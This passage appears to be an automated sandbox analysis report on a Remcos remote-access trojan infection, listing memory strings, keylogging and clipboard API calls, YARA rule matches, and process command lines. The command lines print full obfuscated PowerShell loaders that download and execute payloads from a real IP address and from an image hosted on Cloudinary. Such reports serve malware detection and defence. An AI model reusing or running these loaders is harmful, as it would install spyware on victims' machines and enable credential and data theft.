                      Source: powershell.exe, 00000003.00000002.2233063416.000000000708D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFtM
                      Source: powershell.exe, 00000003.00000002.2235184005.0000000007FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: CasPol.exeString found in binary or memory: http://geoplugin.net/json.gp
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: powershell.exe, 00000003.00000002.2229203641.0000000004E5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: powershell.exe, 00000003.00000002.2231208292.00000000058D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000003.00000002.2229203641.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.00000000047B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485897465.0000000002BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000003.00000002.2229203641.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.00000000047B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000003.00000002.2233063416.00000000070B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://akaStorageSetting.cdxml
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                      Source: powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                      Source: powershell.exe, 00000003.00000002.2229203641.0000000004E5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000003.00000002.2232999397.0000000007060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/odules/WindowsErrorReporting/icrosoft.WindowsErrorRe
                      Source: powershell.exe, 00000003.00000002.2231208292.00000000058D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgt
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49770 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000012_2_004099E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409B10
                      Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BB77 SystemParametersInfoW,12_2_0041BB77

                      System Summary

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prasonJump to behavior
                      Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
